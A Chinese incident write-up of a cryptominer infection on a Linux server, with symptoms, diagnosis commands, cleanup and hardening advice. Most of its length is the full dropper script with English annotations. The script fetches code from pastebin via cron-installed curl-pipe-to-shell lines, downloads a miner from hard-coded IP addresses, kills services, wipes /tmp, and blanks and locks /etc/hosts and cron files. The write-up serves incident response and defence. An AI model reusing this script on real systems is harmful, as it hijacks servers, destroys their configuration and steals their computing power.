记一次被挖矿经历

现象

1.本地/etc/hosts文件被清空,且无法编辑,导致域名无法解析
2.被添加定时任务,且无法删除
3.服务器运行的某些服务被杀掉
4.CPU拉满

异常分析

#1.用lsattr命令查看文件的特殊属性
:~ # lsattr /etc/hosts
---------ia-----e---- /etc/hosts
:~ # chattr -ai /etc/hosts	
:~ # lsattr /etc/hosts
---------ia-----e---- /etc/hosts	#看起来属性去不掉,但实际上已经去掉了,只是病毒程序一直在清空文件并重新加上特殊属性

#2.定时任务crontab
:~ # crontab -l
*/5 * * * * curl -fsSL https://pastebin.com/raw/bwD1BCXt | sh
:~ # crontab -e		#无法编辑,因为这个文件一直被创建并且覆盖掉原来的文件

#3.服务器上部署运行的大部分服务被杀掉,是为了让病毒独占服务器的大量CPU去挖矿,这既是服务宕掉的原因,也是病毒窃取服务器CPU算力的方式

病毒脚本

#病毒脚本通过curl、wget命令下载并执行

#!/bin/sh
# Analyst annotation (incident writeup): this is the stage that the cron line
# observed above pulls every few minutes. It is a flat script with no functions:
#   1. kill processes that look like rival miners/loaders
#   2. re-assert its own cron persistence
#   3. wipe /tmp and /var/tmp
#   4. as root: delete rival artifacts, blank /etc/hosts, rewrite every cron
#      location and lock them with chattr +ia
#   5. download and launch the payload from hard-coded IP:port endpoints
# The comments below record what each step does and which on-disk artifact it
# leaves, so the symptoms listed at the top of the page can be tied to a line.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Kill by substring match on the full `ps aux` line. Several names (kinsing,
# kdevtmpfsi, xmrig further down) are associated with other cryptominers, so
# this presumably clears competitors. Short patterns such as 'echo', 'xmi' and
# 'xms' will also hit unrelated processes.
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'echo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmp' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'urlopen' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'crun' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'x64b' | awk '{print $2}' | xargs -I % kill -9 %
# Anything running out of /tmp/ except a whitelist of service names is killed;
# `cut -c 9-15` takes the PID from a fixed column range of `ps -ef` output, so
# it is layout-dependent.
ps -ef | grep /tmp/ | grep -v 'java\|redis\|mongod\|grep\|weblogic\|oracle\|solr'| cut -c 9-15 | xargs kill -9
ps aux | grep -v grep | grep 'xmi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'xms' | awk '{print $2}' | xargs -I % kill -9 %
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep network | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep crun | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
# Persistence, part 1: strip the immutable/append-only flags from root's
# crontab, delete the whole table, then "check" for its own marker. Because
# `crontab -r` has just run, the grep never matches and the else branch
# re-installs the */5 pastebin entry on every execution. This is the cron line
# seen in `crontab -l` at the top of the page; `$?` here is the status of the
# final `grep -v grep` stage.
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "bwD1BCXt" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  (
    crontab -l 2>/dev/null
    echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/bwD1BCXt | sh"
  ) | crontab -
fi
# Wipe /tmp and /var/tmp after clearing chattr flags and adding rw permission.
# The `*` glob does not match dotfiles, so the script's own /tmp/.solr
# directory (created below) survives this step; only /tmp/.solra is removed
# explicitly.
rm -f /tmp/.solra
pkill oracle.tmp
chattr -isa /tmp/*
chmod +rw /tmp/*
rm -f /tmp/*
rm -f /var/tmp/*
# Collect PIDs of any process whose `ps auxf` line contains "javae" and whose
# %CPU (field 3) is >= 50. `name=""$pp` is just `name=$pp`.
pp=$(ps auxf|grep javae|awk '{if($3>=50.0) print $2}')
name=""$pp
# No busy "javae" process: kill weblogic.sh/javae and carry on. Otherwise wipe
# /tmp again and stop. NOTE(review): this reads like an "already running"
# check for the actor's own payload under that name — unconfirmed.
if [ -z "$name" ]
then
    pkill weblogic.sh
    pkill javae
else
    rm -f /tmp/*
    exit 1
fi
# s2 = current user name; used in the non-root branch below.
s2=`whoami`
if [ `whoami` = "root" ];
then
    # Root branch. First remove other actors' cron drops and helper binaries
    # (the oanacron*/dns/update.sh names are not part of this script's own
    # payload, so presumably rival artifacts).
    chattr -ia /etc/cron.d/*
    rm -rf /etc/cron.d/*
    chattr -i /var/spool/cron/crontabs/root
    chattr -i /usr/local/bin/dns
    rm -f /etc/cron.hourly/oanacroner
    rm -f /etc/cron.hourly/oanacrona
    rm -f /etc/cron.daily/oanacroner
    rm -f /etc/cron.daily/oanacrona
    rm -f /etc/cron.monthly/oanacroner
    rm -f /usr/local/bin/dns
    rm -f /etc/update.sh
    # Symptom #1 on the page: /etc/hosts is emptied and then made
    # immutable + append-only, so it cannot be edited and hosts-based name
    # resolution is lost. Detection: `lsattr /etc/hosts` showing the i/a flags.
    chattr -ia /etc/hosts
    echo >/etc/hosts
    chattr +ia /etc/hosts
    chattr -i /etc/sysupdate
    rm -f /etc/sysupdate
    rm -f /etc/config.json
    rm -f /var/tmp/kworkerds
    rm -f /usr/bin/.systemcero
    rm -f /usr/bin/cloudupdate
    rm -f /usr/bin/diskmanagerd
    rm -f /lib/libterminfo.so
    rm -f /bin/httpsntp
    rm -f /bin/ftpsntp
    rm -f /var/tmp/jspserv
    # Deletes /usr/sbin/cron — on distributions where that is the cron daemon
    # binary this breaks cron itself, which is odd given the script's own
    # cron-based persistence. Also removes /usr/bin/node.
    rm -f /usr/sbin/cron
    rm -f /usr/bin/kinsing*
    rm -f /etc/cron.d/kinsing*
    rm -f /usr/bin/node
    # Flush every user crontab, then lock /tmp/xms if it exists.
    chattr -isa /var/spool/cron/*
    rm -rf /var/spool/cron/*
    chattr +isa /tmp/xms
    rm -f /var/tmp/kinsing
    # Persistence, part 2 (symptom #2 on the page): the system table
    # /etc/crontab is overwritten with a single */10 entry (all legitimate
    # system entries are lost), the same entry is written to root's spool file
    # under both common spool layouts and to /etc/cron.d/root, and every one of
    # them is locked with chattr +ia so `crontab -e`/rm appear to have no
    # effect. Note the URL key here (kqK9uFpy) differs from the bwD1BCXt entry
    # installed earlier; both are on this page as IoCs.
    chattr -ia /etc/crontab
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/kqK9uFpy | sh' > /etc/crontab
    chattr +ia /etc/crontab
    chattr -ia /var/spool/cron/root
    chattr -ia /var/spool/cron/crontabs/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/kqK9uFpy | bash' >/var/spool/cron/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/kqK9uFpy | bash' >/var/spool/cron/crontabs/root
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/kqK9uFpy | sh' > /etc/cron.d/root
    chattr +ia /var/spool/cron/root
    chattr +ia /etc/cron.d/root
    chattr +ia /var/spool/cron/crontabs/root
else
    # Non-root branch: kill every process whose ps line contains the first 7
    # characters of the current user name, minus a whitelist. The whitelist
    # includes the bare `sh`, so any line containing "sh" (ssh, bash, ...) is
    # spared; the trailing `sbin|` alternative is a literal string in BRE.
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|sbin\|WebLogic.sh\|server\|aux\|httpd\|sh\|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
    # Same filter keyed on the script's second positional argument ($2). When
    # invoked from cron no arguments are passed, so grep gets no pattern and
    # this pipeline kills nothing.
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|sbin\|WebLogic.sh\|server\|aux\|httpd\|sh\|sbin|' | grep $2 | awk '{print $2}' | xargs -I % kill -9 %
fi
# Make everything left in /tmp world-accessible, then kill more miner-like
# process names and remove c3pool directories (c3pool appears to be a mining
# pool client directory — unconfirmed from this script alone).
chmod +777 /tmp/*
pkill node
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
pkill miner.sh
rm -rf /root/c3pool/*
rm -rf ~/c3pool/*
# Pre-create directories under the names other malware uses as drop paths, and
# make two of them non-writable — presumably to squat those paths so rivals
# cannot install there. For responders, these empty directories are a cheap
# indicator of this script having run.
mkdir /tmp/dbusex
mkdir /var/tmp/dbusex
mkdir /var/tmp/go
mkdir /tmp/x86_64
mkdir /tmp/i686
mkdir /tmp/x86_643
mkdir /tmp/x64b
mkdir /tmp/go
mkdir /tmp/xmi
mkdir /tmp/zzz
mkdir /tmp/kingsing
pkill dbused
mkdir /var/tmp/kinsing
chmod -w /var/tmp/kinsing
mkdir /tmp/kdevtmpfsi
chmod -w /tmp/kdevtmpfsi
# Payload stage. p = PIDs of "solrd" processes at >= 60% CPU (field 3).
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
    # No busy solrd yet: kill stale copies, then kill ANY process above 60% CPU
    # that is not in the whitelist — this is what takes down the server's own
    # services (symptoms #3 and #4 on the page) to free CPU for the miner.
    pkill solr.sh
    pkill solrd
    ps aux | grep -v grep | grep -v 'java\|redis\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
    # Drop directory is a dotfile under /tmp (survives the `rm -f /tmp/*`
    # above). Three files are fetched from three hard-coded IP:port endpoints
    # (IoCs, see the URLs): a config.json, the payload binary served as
    # "java.exe" and saved as solrd, and a launcher solr.sh.
    mkdir /tmp/.solr
    curl -fsSL http://136.243.19.213:8885/docs/config.json -o /tmp/.solr/config.json
    curl -fsSL http://222.122.47.27:2143/auth/java.exe -o /tmp/.solr/solrd
    curl -fsSL http://27.1.1.34:8080/docs/solr.sh -o /tmp/.solr/solr.sh
    chmod +x /tmp/.solr/solrd
    chmod +x /tmp/.solr/solr.sh
    # Launch the launcher detached. `&>>` is bash syntax; under a strict POSIX
    # sh the line parses differently (the redirect would not apply to solr.sh).
    # After 10 s the launcher script is deleted, so on an infected host the
    # remaining on-disk evidence is /tmp/.solr/solrd, config.json and the
    # running process.
    nohup /tmp/.solr/solr.sh &>>/dev/null &
    sleep 10
    rm -f /tmp/.solr/solr.sh
else
    # A solrd is already consuming >= 60% CPU: nothing more to do this run.
    exit
fi

病毒内部代码逻辑参考

解决方法

#kill掉病毒程序的主进程;同时要清除各处的定时任务、用chattr去掉相关文件的i/a特殊属性并恢复/etc/hosts,否则定时任务每隔几分钟会重新下载并拉起病毒

病毒攻击方式分析

1.系统漏洞
2.常用服务、自开发服务的漏洞
3.端口漏洞
4.弱密码漏洞

系统优化

#1.更新系统补丁
#2.修改redis等服务的绑定地址,限定可以连接Redis服务器的IP
#3.修改常用服务的端口
#4.修改服务器、服务的密码
#5.优化ssh服务,删除 ~/.ssh/authorized_keys 中的陌生公钥
#6.在路由器上封禁IP或IP段